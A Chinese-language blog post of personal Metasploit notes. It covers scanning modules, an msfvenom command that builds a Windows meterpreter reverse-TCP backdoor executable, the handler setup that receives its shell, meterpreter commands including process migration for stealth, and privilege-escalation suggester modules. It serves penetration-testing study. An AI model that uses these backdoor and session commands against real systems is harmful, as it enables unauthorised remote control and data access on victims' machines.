msf常用模块功能整理
更新中
一.基础:
shell中直接输入msfconsole开始运行
- use +模块路径 使用模块
- search+模块关键字 用来搜索模块
- back 返回主界面
模块中:
info 查看模块信息
show options 查看模块设置项
show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86)
expolit/run 开始执行
高级设置:
set AutoRunScript migrate -f 自动迁移进程
二.信息收集:
主机存活探测:auxiliary/scanner/discovery/arp_sweep ARP 扫描auxiliary/scanner/discovery/udp_sweep UDP 扫描auxiliary/scanner/netbios/nbname NETBIOS 扫描auxiliary/scanner/snmp/snmp_enum SNMP 扫描auxiliary/scanner/smb/smb_version SMB 扫描端口扫描:auxiliary/scanner/portscan/ack TCP ACK 端口扫描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描auxiliary/scanner/portscan/syn SYN 端口扫描auxiliary/scanner/portscan/tcp TCP 端口扫描auxiliary/scanner/portscan/xmas TCP XMas 端口扫描
使用方法:1.用内网的机器开个代理,使kali的流量可以到达内网,然后使用模块扫描2.使用后门连接,通过session进行扫描3.在同一个内网里面可以直接扫描(一般不会有这种情况吧,除非我带着电脑潜入目标地点)这三点适用于内网渗透的很多场景
三.渗透
3.1反向后门的使用
我的话:
反弹shell是等受害机器来连接我,所以我在这里的设置,不需要去设置受害机器的ip,因为只要受害机器知道来哪里找我就行了
生成反向后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe
(
高亮为可设置参数,
lhost是监听机ip地址(也就是攻击者kali的ip地址)lport是监听端口(也就是攻击者准备接收反弹回来的shell的那个端口)
)
监听后门:
use exploit/multi/handler
use exploit/multi/handler #通过use选择监听模块
set payload windows/meterpreter/reverse_tcp #选择设置反弹shell的监听(这一步我有几次忽略了,导致出现错误,连接失败,所以这一步一定不要落下,设置监听的类型)
set lhost 192.168.43.43 #这里的ip和端口应该和后门代码保持一致
set lport 18888
exploit #开始执行
meterpreter
获取到shell后,会为被控制的机器开启一个session(会话),msf可以同时监听多个session,并且在不同的session之间随意切换,黑客在session中执行命令等同于在目标主机执行命令,也可以使用msf的攻击模块通过session对目标主机进行攻击。在session中执行命令的模式也被称为meterpreter模式
session中:getuid #获取当前用户的权限吧,看演示里面一般是作这个用的migrate [进程号] #将后门进程迁移到其它进程里面,达到权限维持的效果(更不容易被发现)help #可以显示在meterpreter模式下可以操作的指令列表(一部分)search [-d dir] [-r recurse] -f pattern #在被控制的机器内搜索文件shell #得到终端background #把session放置后台ps #列出所有进程,以及进程的信息(在这里可以看到pid,知道pid就可以使用kill来终止进程了)session外:session -l #列出当前的所有session以及其信息
sessions -K #关闭所有session连接,这里的k是大写
sessions -k [指定session的id] #杀死指定id的session
sessions [id号] #根据id号进入不同的session
3.2提权
补丁查询:
run post/windows/gather/enum_patches 查询补丁信息use post/multi/recon/local_exploit_suggester 这个模块可通过session查询当前可以用来提权的exp,(可能会失灵)
msf常用模块功能整理相关推荐
- python中threading模块详解及常用方法_Python常用模块功能简介(二)threading
threading模块基本用法 threading.Thread.join函数解释 threading.Thread.join(timeout=None)调用该函数的线程会阻塞调用该线程的主线程和其它 ...
- python logging模块的作用及应用场景_Python常用模块功能简介(三)logging
logging基本介绍 先介绍一下我们为什么要使用日志,平常我们编写程序为了验证程序运行与debug,通常会使用print函数来对一些中间结果进行输出验证,在验证成功后再将print语句注释或删除掉. ...
- 【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)
目录 一.简介: 二.下载: 2.1.kali 2.2.官网: 2.3.GitHub: 三.启动方法 四.msf常用基础命令 五.msf结构 六. 核心命令: 一.简介: 很容易地获取.开发并对计算机 ...
- ansible安装部署和配置、常用模块整理
今天心情不错~~~~第25个生日了,又遇昨晚百年难得一见的蓝月亮,所以昨晚连夜整理了文档, 会分为两部分发出去,ansible批量化部署在工作中是非常实用,建议呢 整理大量常用模块去练习 1.1.1 ...
- guns常用功能整理
guns常用功能整理 guns常用功能整理 一.ajax接口请求(常用) 1.1:引入插件库 1.2:调用即可 二.es6模块调用 2.1:当前文件下使用 2.2:封装的代码暴露出去 三.创建temp ...
- 个人整理一些开发中比较常用的功能网址
在这里整理一些比较常用的功能网址,方便以后遇到同样的问题能够快速的找到答案,希望也能帮到大家. 计算两个时间差 https://blog.csdn.net/leeyefang/article/deta ...
- Python学习 - 常用模块(二)
目录 一. 常用模块 - hashlib 二. 常用模块 - hmac 三. 常用模块 - logging 四. 常用模块 - re 五. 常用模块 - requests 六. 常用模块 - para ...
- matplotlib一些常用知识点的整理,
本文作为学习过程中对matplotlib一些常用知识点的整理,方便查找. 强烈推荐ipython 无论你工作在什么项目上,IPython都是值得推荐的.利用ipython --pylab,可以进入Py ...
- Python自学——python的常用模块
Python学习--python的常用模块 原文作者:佛山小程序员 原文链接:https://blog.csdn.net/weixin_44192923/article/details/8656325 ...
最新文章
- 基于MATLAB的交流电动机调速系统仿真
- D. Best Edge Weight(最小生成树 + 树链剖分)(Codeforces Round #423 (Div. 1, rated, based on VK Cup Finals))
- Linux系统编程(四)信号
- 怎么调节Ubuntu系统的屏幕亮度
- 由href return false 来看阻止默认事件
- [转] Official Microsoft Team Blogs / Microsoft Blogs
- zabbix监控主动模式、被动模式、添加监控主机、添加自定义模板、处理图形乱码、自动发现...
- RS485通信原理图及程序实例详解
- Java 常见异常类
- 如何用计算机函数计算房租,Excel商铺租金模板,租金每两年递增5%,具备收租期、租赁起止期、单价函数自动计算功能...
- python 操作微信 群发_python实现给微信公众号发送消息的方法
- 佛山科学技术学院计算机科学与技术李欣华,第七届国务院学位委员会中文学科评议组2019年度 扩大会议在佛山科学技术学院召开...
- 个人应对冲突的五种策略
- 传说中的100句子记忆7000单词(51-100句)
- python热力图参数_python3.5数据处理——百度地图热力图传值
- 腾讯位置服务模仿微信发送位置功能
- APICloud:让开发移动应用像拼积木一样简单
- 运放:运放+TL431+MOS 构成的恒流电路
- Spanish FF Live Support
- asp.net 的 web form 过时了吗?
热门文章
- 荒野今天维护服务器吗,荒野行动1月29日为什么无法登录原因 今天停服更新维护吗?...
- 对于目标检测中mAP@0.5的理解
- 微信开放平台开源_开源的价值在于开放的开发过程
- 【设计教程】photoshop自由变形工具,透视工具的使用!
- 无状态,无连接的理解
- 01 APP被苹果APPStore拒绝的各种原因
- 笔试 | 东方财富 2020 春季校园招聘后端开发在线笔试【Python】【C++】【字符串】【动态规划】
- 微视点:网传社交游戏公司“五分钟”面临倒闭,引发各方热议
- 苹果12轻点背面不灵敏如何解决
- php微信公众号支付实例教程,PHP微信公众号支付教程(含图文)